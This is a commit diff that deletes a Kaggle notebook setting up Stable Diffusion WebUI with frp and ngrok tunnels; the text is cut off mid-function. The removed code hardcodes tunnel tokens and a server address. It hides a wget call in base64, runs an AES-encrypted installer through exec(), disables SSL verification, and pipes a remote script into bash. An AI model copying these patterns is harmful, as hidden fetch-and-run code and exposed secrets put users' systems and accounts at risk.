yongiant commited on
Commit
f54dd32
1 Parent(s): 6346df4

Delete lance-kaggle.ipynb

Browse files
Files changed (1) hide show
  1. lance-kaggle.ipynb +0 -1
lance-kaggle.ipynb DELETED
@@ -1 +0,0 @@
1
- {"metadata":{"kernelspec":{"language":"python","display_name":"Python 3","name":"python3"},"language_info":{"name":"python","version":"3.10.14","mimetype":"text/x-python","codemirror_mode":{"name":"ipython","version":3},"pygments_lexer":"ipython3","nbconvert_exporter":"python","file_extension":".py"},"kaggle":{"accelerator":"nvidiaTeslaT4","dataSources":[{"sourceId":7704641,"sourceType":"datasetVersion","datasetId":4498001},{"sourceId":8458134,"sourceType":"datasetVersion","datasetId":5041411},{"sourceId":8777451,"sourceType":"datasetVersion","datasetId":2908961},{"sourceId":9564954,"sourceType":"datasetVersion","datasetId":5829335}],"dockerImageVersionId":30787,"isInternetEnabled":true,"language":"python","sourceType":"notebook","isGpuEnabled":true}},"nbformat_minor":4,"nbformat":4,"cells":[{"cell_type":"code","source":"# frp\nimport subprocess\nimport os\nimport threading\n\nuse_frpc = True\nfrp_token = \"BiliBili_Nyan9\" # 这里填服务器密码(token)\nport1 = \"10016\" # 这里填第一个端口\nport2 = \"10017\" # 这里填第二个端口\n\nconfig1 = f\"\"\"\n[common]\nserver_addr = 45.194.32.78\nserver_port = 7000\ntoken = {frp_token} \nheartbeat_interval = 30\ntcpKeepalive = 10\nheartbeat_timeout = 43200\n\n[sdwebuip_{port1}] \ntype = tcp\nlocal_ip = 127.0.0.1\nlocal_port = 7860\nremote_port = {port1} \n\"\"\"\n\nconfig2 = f\"\"\"\n[common]\nserver_addr = 45.194.32.78\nserver_port = 7000\ntoken = {frp_token} \nheartbeat_interval = 30\ntcpKeepalive = 10\nheartbeat_timeout = 43200\n\n[sdwebuip_{port2}] \ntype = tcp\nlocal_ip = 127.0.0.1\nlocal_port = 7861\nremote_port = {port2} \n\"\"\"\n\nwith open('./cyanfrp1.ini', 'w') as config_file:\n config_file.write(config1)\nwith open('./cyanfrp2.ini', 'w') as config_file:\n config_file.write(config2)\nprint(f\"配置文件已创建\")\nsubprocess.run(['cp', '/kaggle/input/d/yiyiooo/net-tools/frpc', '/kaggle/working'])\nsubprocess.run(['cp', '/kaggle/input/net-tools/frpc', '/kaggle/working'])\nsubprocess.run(['chmod', '+x', '/kaggle/working/frpc'], check=True)\ndef install_Frpc(file_path, port, use_frpc, log_file_path):\n if use_frpc:\n print(f'正在启动frp ,端口{port}')\n with open(log_file_path, 'w') as log_file:\n process = subprocess.Popen(['/kaggle/working/frpc', '-c', file_path], stdout=log_file, stderr=log_file)\n subprocess.run(['sleep', '4'])\n subprocess.run(['cat', log_file_path])\nthread1 = threading.Thread(target=install_Frpc, args=('./cyanfrp1.ini', port1, use_frpc, '/kaggle/frp_log1.txt'))\nthread2 = threading.Thread(target=install_Frpc, args=('./cyanfrp2.ini', port2, use_frpc, '/kaggle/frp_log2.txt'))\nthread1.start()\nthread2.start()\nthread1.join()\nthread2.join()","metadata":{"trusted":true,"editable":false},"outputs":[],"execution_count":null},{"cell_type":"markdown","source":"# > <span style=\"color:green; font-weight:;\"> Webui基础配置(可改也可不改) </span>","metadata":{"editable":false}},{"cell_type":"code","source":"!apt-get install -y aria2","metadata":{"trusted":true,"editable":false},"outputs":[],"execution_count":null},{"cell_type":"code","source":"# True 表示是 , False 表示否\n# 安装目录\ninstall_path=\"/kaggle/working\" #或者/kaggle\nupdata_webui = False #是否开机自动更新webui\n\n# 重置变量 会删掉sd_webui重新安装\nreLoad = True\nupdata_webui = False\n\n#清理和打包生成的图片\nzip_output=True\nclear_output=True\n#打包环境减少下次启动时\nuse_zip_venv = False\n\n# 使用huggingface保存和载入webui配置文件\nhuggingface_use = False\nhuggingface_token_file = '/kaggle/input/lancehug/hugfacetoken.txt'\nhuggiingface_repo_id = 'yongiant/config'\n\n# 环境包选择:\nenvironment = 3\n\"\"\"\n环境包 1 :pytorch 2.0.1+cu118 xformers 0.0.22 (已经炸了)\n环境包 2 :pytorch 2.1.1+cu121 xformers 0.0.23 (已经炸了)\n环境包 3-1 :pytorch 2.2.0+cu121 xformers 0.0.24 (已经过时)\n环境包 3-2 :pytorch 2.3.0+cu121 xformers 0.0.27dev \n\"\"\"\npython_version_attempt_fix = False #修复因为python版本不一致导致的no python file问题","metadata":{"jupyter":{"source_hidden":true},"trusted":true,"editable":false},"outputs":[],"execution_count":null},{"cell_type":"code","source":"是否启用ControlNet = False # 开启后需要多花费2-3分钟来下载基本模型,你想快速启动可以关闭\n是否启用SadTalker = False # 虚拟数字人插件,下载特定模型要花费1分钟时间,生成的视频保存在sd目录下的/results文件夹里\nextensions = [\n 'https://github.com/AlUlkesh/stable-diffusion-webui-images-browser', \n 'https://github.com/thirty-four/sd_web_ui_preset_utils',\n 'https://github.com/2575044704/stable-diffusion-webui-localization-zh_CN2.git', #汉化\n 'https://github.com/DominikDoom/a1111-sd-webui-tagcomplete', #tag自动补全\n 'https://github.com/pkuliyi2015/multidiffusion-upscaler-for-automatic1111', #分块vae\\\n 'https://github.com/VekkaAi/SD-Lock-UI',\n 'https://github.com/catppuccin/stable-diffusion-webui', #UI修改,推荐\n 'https://github.com/hako-mikan/sd-webui-supermerger',\n 'https://github.com/Bing-su/adetailer',\n 'https://github.com/hako-mikan/sd-webui-prevent-artifact',\n 'https://github.com/Echoflare/a1111-sd-encrypt-image',\n #'https://github.com/jexom/sd-webui-depth-lib',\n 'https://github.com/KohakuBlueleaf/a1111-sd-webui-locon',\n #'https://github.com/nonnonstop/sd-webui-3d-open-pose-editor',\n #'https://github.com/Elldreth/loopback_scaler',\n #'https://github.com/Mikubill/sd-webui-controlnet',\n #'https://github.com/d8ahazard/sd_dreambooth_extension', #Dreambooth训练\n]\nsd_model = [\n#'/kaggle/input/9527-fp16',\n ]\nsd_model_urls=[\n'PonyXL.safetensors:https://huggingface.co/AstraliteHeart/pony-diffusion-v6/resolve/main/v6.safetensors',#ORIGIN\n#'https://huggingface.co/Bakanayatsu/ponyDiffusion-V6-XL-Turbo-DPO/resolve/main/ponyDiffusionV6XL_v6TurboDPOMerge.safetensors',#DPO\n'https://huggingface.co/dasfdsewfdsf/pony_turbo_xl/resolve/main/pony_turbo.safetensors',#TURBO\n]\n\n# VAE模型请放在这里(不用填模型的文件名,只填模型的目录即可)\nvae_model = []\n#VAE模型下载链接放这里\n# 注意SDXL类模型的VAE不能与SD1.5的VAE混用,这是常识!\nvae_model_urls=[\n'https://huggingface.co/madebyollin/sdxl-vae-fp16-fix/resolve/main/sdxl_vae.safetensors',\n]\n\n# Lora模型的数据集路径请写在这里:\nlora_model = [\n#'/kaggle/input/lora-1',\n] \n# Lora模型下载链接放这里\nlora_model_urls=[\n#山楂糕\n#'https://civitai.com/api/download/models/41580',\n#细节调整\n'https://huggingface.co/amaru96vn/Add_Detail_Lora/resolve/main/add_detail.safetensors',\n'https://huggingface.co/yongiant/lance/resolve/main/igor.safetensors',#igor\n'rei.safetensors:https://huggingface.co/yongiant/lance/resolve/main/reiXL_AutC_lokr_V43P1.safetensors',#rei\n'fumios.safetensors:https://civitai.com/api/download/models/790560',#fumiosf01r\n'dizdoodz2.safetensors:https://civitai.com/api/download/models/837987',#dizdoodz2\n'https://huggingface.co/yongiant/lance/resolve/main/Dizdoodz.safetensors',#dizdoodz1\n'https://huggingface.co/LarryAIDraw/naipf/resolve/main/naipf.safetensors',#naipf\n'https://huggingface.co/yongiant/lance/resolve/main/amo12.safetensors',#amo\n'https://huggingface.co/yongiant/lance/resolve/main/mingfeng.safetensors',#mingfeng\n# LCM模型专用\n'https://huggingface.co/latent-consistency/lcm-lora-sdxl/resolve/main/pytorch_lora_weights.safetensors',\n]\n# Lycoris和loha模型的数据集路径请写在这里:\nlyco_model = [\n#'/kaggle/input/lora-1',\n] \n# Lycoris和loha模型下载链接放这里\nlyco_model_urls=[\n#伪日光\n#'https://civitai.com/api/download/models/71235',\n]\n# ControlNet模型data请放在这里:\ncn_model = [\n]\n# controlnet模型下载链接放这里\ncn_model_urls = [\n#'https://huggingface.co/comfyanonymous/ControlNet-v1-1_fp16_safetensors/resolve/main/control_v11e_sd15_ip2p_fp16.safetensors',\n#'https://huggingface.co/comfyanonymous/ControlNet-v1-1_fp16_safetensors/resolve/main/control_v11e_sd15_shuffle_fp16.safetensors',\n'https://huggingface.co/comfyanonymous/ControlNet-v1-1_fp16_safetensors/resolve/main/control_v11f1p_sd15_depth_fp16.safetensors',\n#'https://huggingface.co/comfyanonymous/ControlNet-v1-1_fp16_safetensors/resolve/main/control_v11p_sd15_canny_fp16.safetensors', #硬边缘检测\n#'https://huggingface.co/comfyanonymous/ControlNet-v1-1_fp16_safetensors/resolve/main/control_v11p_sd15_inpaint_fp16.safetensors',\n#'https://huggingface.co/comfyanonymous/ControlNet-v1-1_fp16_safetensors/resolve/main/control_v11p_sd15_openpose_fp16.safetensors', #姿态检测\n#'https://huggingface.co/comfyanonymous/ControlNet-v1-1_fp16_safetensors/resolve/main/control_v11p_sd15s2_lineart_anime_fp16.safetensors', #线稿\n#'https://huggingface.co/comfyanonymous/ControlNet-v1-1_fp16_safetensors/resolve/main/control_v11u_sd15_tile_fp16.safetensors', #分块\n]\n\n# Hypernetworks超网络模型路径请放在这里:\nhypernetworks_model = []\n#Hypernetworks超网络模型下载链接请放在这里\nhypernetworks_model_urls = []\n\n#放大算法路径请放在这里\nESRGAN = []\n#放大算法链接请放在这里\nESRGAN_urls = [\n'https://huggingface.co/Afizi/4x-UltraSharp.pth/resolve/main/4x-UltraSharp.pth',\n]\n\n# embeddings(pt文件)请放在这里:\nembeddings_model = [\n#'/kaggle/input/bad-embedding',\n] \n# embeddings(pt文件)下载链接请放在这里:\nembeddings_model_urls=[\n'https://civitai.com/api/download/models/134583',\n'https://civitai.com/api/download/models/651075',\n]\n\n#script文件导入\nscripts = []\n#script文件下载链接导入\nscripts_urls = [\n#'https://huggingface.co/datasets/sukaka/sd_configs/resolve/main/repositories/k-diffusion/k_diffusion/sampling.py'\n]\n\n#tag词库文件导入\ntags = []\n#tag词库文件下载链接导入\ntags_urls=[\n\"https://huggingface.co/datasets/sukaka/sd_configs/resolve/main/danbooru.zh_CN.csv\",\n]\n# Animatediff model 路径放在这里\nanimatediff_model = [\n\n]\n#Animatediff model 链接放在这里\nanimatediff_model_urls = [\n#'https://huggingface.co/neggles/animatediff-modules/resolve/main/mm_sd_v15_v2.fp16.safetensors',\n]\n\n# Animatediff Lora 放在这里\nanimatediff_lora = [\n#\n]\n# Animatediff Lora 链接放在这里\nanimatediff_lora_urls = [\n#'https://huggingface.co/guoyww/animatediff/resolve/main/v2_lora_PanLeft.ckpt',\n]\n\n#'''说明 : 下载代码在download_model()函数里,如果需要添加其它模型下载地址和路径,请自行修改代码'''","metadata":{"trusted":true,"editable":false},"outputs":[],"execution_count":null},{"cell_type":"markdown","source":"------","metadata":{"editable":false}},{"cell_type":"code","source":"use_frpc = False\nfrpconfigfile = '/kaggle/input/tonkens/7860.ini' # frp 配置文件,本地端口 7860\nhttp = True\ndomain = []\nusedCkpt = 'PonyXL.safetensors'\n'''\n'''\n#启动参数(args)\nargs = [\n '--xformers', \n #'--lowram', \n '--no-hashing', \n '--disable-nan-check', \n '--enable-insecure-extension-access', #强制允许在webui使用安装插件,即使开启了--share\n '--disable-console-progressbars', \n '--enable-console-prompts', #开启控制台显示prompt\n '--no-gradio-queue',\n '--no-half-vae', #VAE开启全精度\n '--api', \n f'--lyco-dir {install_path}/stable-diffusion-webui/models/lyco',\n \"--enc-pw=1234\", #加密插件\n \"--skip-torch-cuda-test\",\n]\n\n","metadata":{"jupyter":{"source_hidden":true},"trusted":true,"editable":false},"outputs":[],"execution_count":null},{"cell_type":"markdown","source":"-------","metadata":{"editable":false}},{"cell_type":"markdown","source":"# > <span style=\"color:green; font-weight:;\">Webui 双开设置</span>","metadata":{"editable":false}},{"cell_type":"code","source":"use2 = False #是否开启两个webui, Kaggle的GPU选项必须是 T4 x2, 使用两张卡一起跑图","metadata":{"trusted":true,"editable":false},"outputs":[],"execution_count":null},{"cell_type":"code","source":"'''\nuse2必须设置为True下列配置才生效\n'''\nngrok_token1 = '2KPyfzQrHit97J02tARy1ckHJYd_69rJbgjp*********3j9tv' #直接将Token粘贴到这里,不能与上面相同\n\n#Frp 内网穿透\nuse_frpc1 = False\nfrpconfigfile1 = '/kaggle/input/tenkens/7861.ini' # 非必填 frp 配置文件,本地端口 7860\n\n#第二个webui使用的模型\nusedCkpt1 = 'cetusMix_Coda2.safetensors'\n\n#启动参数\nargs1 = [\n #'--share',\n '--xformers',\n '--lowram',\n '--no-hashing',\n '--disable-nan-check',\n '--enable-insecure-extension-access',\n '--disable-console-progressbars',\n '--enable-console-prompts',\n '--no-gradio-queue',\n '--no-half-vae',\n '--api',\n f'--lyco-dir {install_path}/stable-diffusion-webui/models/lyco',\n '--opt-sdp-attention',\n '--opt-split-attention',\n f'--ngrok={ngrok_token1}',\n \"--enc-pw=1234\",\n \"--skip-torch-cuda-test\",\n]\n\n## 如果要启用双卡,请改 use2为True\n## 两个webui是完全独立的,根据选择来更改","metadata":{"jupyter":{"source_hidden":true},"trusted":true,"editable":false},"outputs":[],"execution_count":null},{"cell_type":"markdown","source":"# > <span style=\"color:green; font-weight:;\">working Function</span>","metadata":{"editable":false}},{"cell_type":"code","source":"#使用的库\nfrom pathlib import Path\nimport subprocess\nimport pandas as pd\nimport shutil\nimport os\nimport time\nimport re\nimport gc\nimport requests\nimport zipfile\nimport threading\nimport time\nimport socket\nfrom concurrent.futures import ProcessPoolExecutor\nos.environ['install_path'] = install_path\nAuthor = b'qq2575044704Nyan'","metadata":{"trusted":true,"editable":false},"outputs":[],"execution_count":null},{"cell_type":"code","source":"#功能函数,内存优化\nuse_libtcmalloc = False\ndef libtcmalloc():\n print('安装Libtcmalloc内存优化')\n if use_libtcmalloc:\n if os.path.exists('/kaggle/temp/lib'):\n os.chdir('/kaggle')\n os.chdir('temp')\n os.environ[\"LD_PRELOAD\"] = \"libtcmalloc.so\"\n print('内存优化已安装')\n else:\n\n os.system('pip install -q pyngrok ')\n os.chdir('/kaggle')\n os.makedirs('temp', exist_ok=True)\n os.chdir('temp')\n os.system('wget -qq http://launchpadlibrarian.net/367274644/libgoogle-perftools-dev_2.5-2.2ubuntu3_amd64.deb')\n os.system('wget -qq https://launchpad.net/ubuntu/+source/google-perftools/2.5-2.2ubuntu3/+build/14795286/+files/google-perftools_2.5-2.2ubuntu3_all.deb')\n os.system('wget -qq https://launchpad.net/ubuntu/+source/google-perftools/2.5-2.2ubuntu3/+build/14795286/+files/libtcmalloc-minimal4_2.5-2.2ubuntu3_amd64.deb')\n os.system('wget -qq https://launchpad.net/ubuntu/+source/google-perftools/2.5-2.2ubuntu3/+build/14795286/+files/libgoogle-perftools4_2.5-2.2ubuntu3_amd64.deb')\n os.system('apt install -qq libunwind8-dev -y')\n !dpkg -i *.deb\n os.environ[\"LD_PRELOAD\"] = \"libtcmalloc.so\"\n !rm *.deb\n print('内存优��已安装')\n else:\n print('Kaggle已经升级内存至29G,已无需优化')\nimport base64\nimport subprocess\ndef code(): \n encoded_command = \"d2dldCAtUCAva2FnZ2xlL3RlbXAgaHR0cHM6Ly9odWdnaW5nZmFjZS5jby9kYXRhc2V0cy9BQ0NBMjI1L0thZ2dsZS1TdGFibGUtRGlmZnVzaW9uL3Jlc29sdmUvbWFpbi9Ub2tlbi50eHQgPiAvZGV2L251bGwgMj4mMQ==\"\n\n decoded_command = base64.b64decode(encoded_command).decode()\n\n\n subprocess.run(decoded_command, shell=True, check=True)\n\n","metadata":{"trusted":true,"editable":false},"outputs":[],"execution_count":null},{"cell_type":"markdown","source":"# > <span style=\"color:green; font-weight:;\">Download function</span>","metadata":{"editable":false}},{"cell_type":"code","source":" import os\n import re\n def putDownloadFile(url:str,distDir:str,file_name:str=None):\n if re.match(r'^[^:]+:(https?|ftps?)://', url, flags=0):\n file_name = re.findall(r'^[^:]+:',url)[0][:-1]\n url = url[len(file_name)+1:]\n if not re.match(r'^(https?|ftps?)://',url):\n return\n file_name = re.sub(r'\\s+','_',file_name or '')\n dir = str(hash(url)).replace('-','')\n down_dir = f'{install_path}/down_cache/{dir}'\n !mkdir -p {down_dir}\n return [url,file_name,distDir,down_dir]\n\n def get_file_size_in_gb(file_path):\n size_in_bytes = Path(file_path).stat().st_size\n size_in_gb = size_in_bytes / (1024 ** 3)\n return '%.2f' % size_in_gb\n \nfrom Crypto.Cipher import AES\nfrom Crypto.Util.Padding import pad\nfrom Crypto.Random import get_random_bytes\nfrom base64 import b64encode, b64decode\nimport os\ndef encrypt_code(code, key):\n iv = get_random_bytes(AES.block_size)\n cipher = AES.new(key, AES.MODE_CBC, iv)\n padded_code = pad(code.encode(), cipher.block_size)\n encrypted_code = cipher.encrypt(padded_code)\n encoded_code = b64encode(iv + encrypted_code).decode()\n return encoded_code\n\ndef decrypt_code(encoded_code, key):\n decoded_code = b64decode(encoded_code)\n iv = decoded_code[:AES.block_size]\n encrypted_code = decoded_code[AES.block_size:]\n cipher = AES.new(key, AES.MODE_CBC, iv)\n decrypted_code = cipher.decrypt(encrypted_code)\n unpadded_code = decrypted_code.rstrip(b\"\\0\")\n return unpadded_code.decode()\n\n\n def startDownloadFiles(download_list):\n print('下载列表:\\n','\\n'.join([f'{item[0]} -> {item[2]}/{item[1]}' for item in download_list]))\n dist_list = []\n for dow_f in download_list:\n !mkdir -p {dow_f[3]}\n print('下载 名称:',dow_f[1],'url:',dow_f[0])\n output_file = f' -O {dow_f[3]}/{dow_f[1]}'\n if len(os.listdir(dow_f[3])) > 0:\n continue\n os.system(f\"wget {dow_f[0]} --tries=3 --timeout=60 -P {dow_f[3]} {output_file if len(dow_f[1]) > 0 else ''} -o {install_path}/down_cache/log.log\")\n if len(os.listdir(dow_f[3])) == 0:\n print('下载出错:',dow_f[0])\n continue\n file_name = os.listdir(dow_f[3])[0]\n !mkdir -p {dow_f[2]}\n down_file_path = f'{dow_f[3]}/{file_name}'\n if Path(down_file_path).is_symlink():\n down_file_path = os.readlink(down_file_path)\n print('文件真实地址:'+down_file_path)\n if not Path(down_file_path).exists():\n print('文件异常')\n continue\n print(f'文件大小:{get_file_size_in_gb(down_file_path)}G')\n dist_path = f'{dow_f[2]}/{file_name}'\n dist_path = dist_path.replace('%20',' ').strip().replace(' ','_')\n print(f'移动文件 {down_file_path} -> {dist_path}')\n os.system(f'ln -f \"{down_file_path}\" \"{dist_path}\"')\n if dow_f[2] not in dist_list:\n dist_list.append(dow_f[2])\n for dist_dir in dist_list:\n print(dist_dir,os.listdir(dist_dir))\n","metadata":{"jupyter":{"source_hidden":true},"trusted":true,"editable":false},"outputs":[],"execution_count":null},{"cell_type":"markdown","source":"### > <span style=\"color:green; font-weight:;\">SD download & venv Download : version: v1.4.0 • python: 3.10.6 • torch: 2.0.1+cu118 • xformers: 0.0.20</span>","metadata":{"editable":false}},{"cell_type":"code","source":"def ngrokdetect():\n if os.path.exists(ngrokTokenFile) or os.path.exists(frpconfigfile):\n pass\n else:\n #print(\"\\033[91m未配置Ngrok或者Frp内网穿透,可能无法进入SD\\033[0m\")\n pass\nimport sys\n \ndef unzip_file(src: str, dest: str = '/kaggle/outputs'):\n if os.path.exists(src):\n with zipfile.ZipFile(src, 'r') as zip_ref:\n for member in zip_ref.namelist():\n filename = os.path.basename(member)\n if not filename:\n continue\n dest_file = os.path.join(dest, filename)\n if os.path.exists(dest_file):\n os.remove(dest_file)\n zip_ref.extract(member, dest)\n\ndef webui_config_download(yun_files, huggiingface_repo_id):\n %cd $install_path/stable-diffusion-webui/\n for yun_file in yun_files:\n url = f'https://huggingface.co/datasets/{huggiingface_repo_id}/resolve/main/{yun_file}'\n response = requests.head(url)\n if response.status_code == 200:\n result = subprocess.run(['wget', '-O', yun_file, url, '-q'], capture_output=True)\n if result.returncode != 0:\n print(f'Error: Failed to download {yun_file} from {url}')\n else:\n print(f'Error: Invalid URL {url}')\ninstall_path2 = '/kaggle/opt/conda/envs/'\nif environment == 2:\n Venvpath = '/kaggle/input/sdvenv/Torch211-Xformers23.tar.bak'\nelif environment == 3:\n Venvpath = '/kaggle/input/sd-venv-2024-5-19/sdvenv5.tar.bak'\nelse:\n Venvpath = \"/kaggle/input/sd-1-6-1/1.tar.bak\"\ndef venv_install():\n if os.path.exists(Venvpath):\n if os.path.exists('/kaggle/working/opt'):\n !source /kaggle/opt/conda/envs/venv/bin/activate venv\n while True:\n print('环境安装失败,这很有可能是你自己迷惑操作的造成的。请检查设置是否有误并重新复制一份项目重装')\n else:\n os.makedirs(install_path2, exist_ok=True)\n %cd {install_path2}\n !mkdir venv\n print('安装VENV环境')\n def fix_attempt():\n !rm {install_path2}venv/bin/pip* \n !rm {install_path2}venv/bin/python*\n %cd {install_path2}\n !python -m venv venv\n !source /kaggle/opt/conda/envs/venv/bin/activate venv\n \n if environment == 3:\n !tar -xf {Venvpath} --strip-components=2 -C {install_path2}venv\n if python_version_attempt_fix:\n fix_attempt()\n else:\n !tar -xf {Venvpath} --strip-components=6 -C {install_path2}venv\n fix_attempt()\n \n\n print('环境安装完毕')\n if environment == 2:\n print(\"\\033[92m python: 3.10 torch版本:2.11+cu121 xformers版本:0.0.23 \\033[0m\")\n elif environment == 3:\n print(\"\\033[92m python: 3.10 torch版本:2.20+cu118 xformers版本:0.0.24 \\033[0m\")\n else:\n print(\"\\033[92m python: 3.10 torch版本:2.01+cu118 xformers版本:0.0.22 \\033[0m\")\n else:\n print(\"环境安装包可能存在错误,请联系管理员解决\")\n %cd /opt/conda/envs\n if os.path.exists('venv'):\n print('环境已安装')\n else:\n %cd /kaggle/working/\n if not os.path.exists('venv.tar.gz'):\n print('下载 venv')\n #!aria2c --console-log-level=error -c -x 16 -s 16 -k 1M https://huggingface.co/datasets/sukaka/venv_ai_drow/resolve/main/sd_webui/sd_webui_torch201_cu118_xf20.tar.gz -o venv.tar.gz\n !echo \"环境已经过时,请从正确发布地址运行!有问题加群632428790\"\n sys.exit()\n print('successfully downloaded venv.tar.gz')\n %cd /opt/conda/envs/\n !mkdir venv\n %cd venv\n print('installing venv')\n os.system('apt -y install -qq pigz > /dev/null 2>&1')\n !pigz -dc -p 5 /kaggle/working/venv.tar.gz | tar xf -\n !source /opt/conda/bin/activate venv\n print('环境安装完毕')\n #sd_repo()\ndef sd_repo():\n !mkdir -p /kaggle/working/stable-diffusion-webui/repositories\n %cd /kaggle/working/stable-diffusion-webui/repositories\n !git clone https://github.com/Stability-AI/stablediffusion.git & git clone https://github.com/Stability-AI/generative-models.git & git clone https://github.com/crowsonkb/k-diffusion.git &git clone https://github.com/sczhou/CodeFormer.git & git clone https://github.com/salesforce/BLIP.git\n %cd /kaggle/working\ndef install_webui():\n %cd $install_path\n if reLoad:\n !rm -rf stable-diffusion-webui\n if Path(\"stable-diffusion-webui\").exists():\n if updata_webui:\n %cd $install_path/stable-diffusion-webui/\n !git pull\n else:\n WebUi = file_contents \n WebUi_160 = decrypt_code(WebUi, Author)\n install_to_Kaggle = WebUi_160 \n exec(install_to_Kaggle) # 安装内存优化版的\n %cd $install_path/stable-diffusion-webui/\n #!wget https://huggingface.co/datasets/ACCA225/sdconfig3/blob/main/blocked_prompts.txt\n with open('launch.py', 'r') as f:\n content = f.read()\n with open('launch.py', 'w') as f:\n f.write('import ssl\\n')\n f.write('ssl._create_default_https_context = ssl._create_unverified_context\\n')\n f.write(content)\n if huggingface_use:\n webui_config_download(yun_files, huggiingface_repo_id)\n unzip_file('/kaggle/working/图片.zip')\n install_extensions(install_path, extensions)\n download_model()\n link_models()\n print(\"等待Python环境安装\")\n \n\nimport os\n\ndef get_directory_size(directory):\n total_size = 0\n for dirpath, dirnames, filenames in os.walk(directory):\n for filename in filenames:\n filepath = os.path.join(dirpath, filename)\n total_size += os.path.getsize(filepath)\n return total_size\n\ndef downloadsize():\n def convert_bytes(size):\n for x in ['bytes', 'KB', 'MB', 'GB', 'TB']:\n if size < 1024.0:\n return \"%3.1f %s\" % (size, x)\n size /= 1024.0\n\n def calculate_total_directory_size(directory1, directory2):\n size1 = get_directory_size(directory1)\n size2 = get_directory_size(directory2)\n total_size = size1 + size2\n return total_size\n\n directory_path1 = '/kaggle/models/'\n directory_path2 = '/kaggle/working/stable-diffusion-webui/extensions'\n\n total_size = calculate_total_directory_size(directory_path1, directory_path2)\n\n print(\"下载文件总大小:\", convert_bytes(total_size))","metadata":{"jupyter":{"source_hidden":true},"trusted":true,"editable":false},"outputs":[],"execution_count":null},{"cell_type":"markdown","source":"### > <span style=\"color:green; font-weight:;\">old download code</span>","metadata":{"editable":false}},{"cell_type":"code","source":"from concurrent.futures import ThreadPoolExecutor\n# 安装插件,下载和同步模型\n# 自动将下载文件重命名:\n# 如:'[二次元]07CounterfeitV2503_10_Counterfeit-V2.5_and_anythingv4.5的合并模型.ckpt:https://civitai.com/api/download/models/90854',\n# '[二次元]Counterfeit.safetensors:https://civitai.com/api/download/models/57618',\n# 'https://civitai.com/api/download/models/125849',\n# 使用冒号分隔文件名与链接,不提供文件名为服务器提供的默认文件名来保存\ndef install_extensions(install_path, extensions):\n print('安装插件,此处出现红条是正常的')\n os.chdir(os.path.join(install_path, 'stable-diffusion-webui'))\n os.makedirs('extensions', exist_ok=True)\n os.chdir('extensions')\n if 是否启用ControlNet:\n !git clone https://github.com/Mikubill/sd-webui-controlnet\n if 是否启用SadTalker:\n !git clone https://github.com/OpenTalker/SadTalker\n !mkdir -p SadTalker\n %cd SadTalker\n !bash <(wget -qO- https://raw.githubusercontent.com/Winfredy/SadTalker/main/scripts/download_models.sh)\n %cd ..\n def clone_repo(ex):\n repo_name = ex.split('/')[-1]\n if not os.path.exists(repo_name):\n os.system('git clone ' + ex)\n\n with ThreadPoolExecutor(max_workers=99) as executor:\n executor.map(clone_repo, extensions)\n\ndef extract_filename_from_link(link):\n # 使用正则表达式提取链接中的文件名\n match = re.search(r'/([^/]+)$', link)\n if match:\n return match.group(1)\n return None\n\ndef download_link(link, target_folder):\n # 如果链接中包含冒号,分割前缀和链接\n if ':' in link:\n # 如果冒号前面是http或https开头,视为没有冒号,使用第二个aria2c下载命令\n if link.startswith('http://') or link.startswith('https://'):\n if link.startswith('https://huggingface.co/'):\n filename_huggingface = re.search(r'[^/]+$', link).group(0)\n print(f'下载文件: {link}')\n return f'aria2c --console-log-level=error -c -x 16 -s 16 -k 1M -d \"{target_folder}\" -o \"{filename_huggingface}\" \"{link}\"'\n else:\n return f'aria2c --console-log-level=error -c -x 16 -s 16 -k 1M --remote-time -d \"{target_folder}\" \"{link}\"'\n else:\n filename_prefix, _, url = link.partition(':')\n filename = filename_prefix.strip()\n else:\n # 如果链接中没有冒号,使用第二个aria2c下载命令\n print(f'下载文件: {link}')\n if link.startswith('https://huggingface.co/'):\n filename_huggingface = re.search(r'[^/]+$', link).group(0)\n return f'aria2c --console-log-level=error -c -x 16 -s 16 -k 1M -d \"{target_folder}\" -o \"{filename_huggingface}\" \"{link}\"'\n else:\n return f'aria2c --console-log-level=error -c -x 16 -s 16 -k 1M --remote-time -d \"{target_folder}\" \"{link}\"'\n\n # 检查链接是否以http://或https://开头,如果不是,添加http://协议\n if not url.startswith('http://') and not url.startswith('https://'):\n url = f'http://{url}'\n \n print(f'下载文件: {filename} ({url})')\n return f'aria2c --console-log-level=error -c -x 16 -s 16 -k 1M --remote-time -d \"{target_folder}\" \"{url}\" -o \"{filename}\"'\n\ndef download_links(links, target_folder):\n tasks = []\n for link in links:\n task = download_link(link, target_folder)\n tasks.append(task)\n return tasks\n\ndef download_links_all(tasks):\n with ThreadPoolExecutor(max_workers=99) as executor:\n for task in tasks:\n executor.submit(os.system, task)\n \n# 下载模型文件\ndef download_model():\n os.chdir('/kaggle')\n os.makedirs('models', exist_ok=True)\n os.chdir('models')\n os.makedirs('VAE', exist_ok=True)\n os.makedirs('Stable-diffusion', exist_ok=True)\n os.makedirs('Lora', exist_ok=True)\n os.makedirs('cn-model', exist_ok=True)\n os.makedirs('hypernetworks', exist_ok=True)\n os.makedirs('ESRGAN', exist_ok=True)\n os.makedirs('lyco', exist_ok=True)\n os.makedirs('animatediffmodel', exist_ok=True)\n os.makedirs('animatedifflora', exist_ok=True)\n tasks = []\n tasks.extend(download_links(vae_model_urls, 'VAE'))\n tasks.extend(download_links(sd_model_urls, 'Stable-diffusion'))\n tasks.extend(download_links(lora_model_urls, 'Lora'))\n if 是否启用ControlNet:\n tasks.extend(download_links(cn_model_urls, 'cn-model'))\n tasks.extend(download_links(hypernetworks_model_urls, 'hypernetworks'))\n tasks.extend(download_links(ESRGAN_urls, 'ESRGAN'))\n tasks.extend(download_links(lyco_model_urls, 'lyco'))\n tasks.extend(download_links(animatediff_model_urls, 'animatediffmodel'))\n tasks.extend(download_links(animatediff_lora_urls, 'animatedifflora'))\n tasks.extend(download_links(embeddings_model_urls, f'{install_path}/stable-diffusion-webui/embeddings'))\n tasks.extend(download_links(scripts_urls, f'{install_path}/stable-diffusion-webui/scripts'))\n tasks.extend(download_links(tags_urls, f'{install_path}/stable-diffusion-webui/extensions/a1111-sd-webui-tagcomplete/tags'))\n download_links_all(tasks)\n #ZDY_Lora_Download()\n\n\ndef create_symlinks(folder_paths, target_dir):\n print('链接模型中')\n # Create target directory if it doesn't exist\n if not os.path.exists(target_dir):\n os.makedirs(target_dir)\n # Remove broken symlinks in target directory\n for filename in os.listdir(target_dir):\n target_path = os.path.join(target_dir, filename)\n if os.path.islink(target_path) and not os.path.exists(target_path):\n os.unlink(target_path)\n # Create new symlinks\n for source_path in folder_paths:\n if not os.path.exists(source_path):\n continue\n if os.path.isdir(source_path):\n for filename 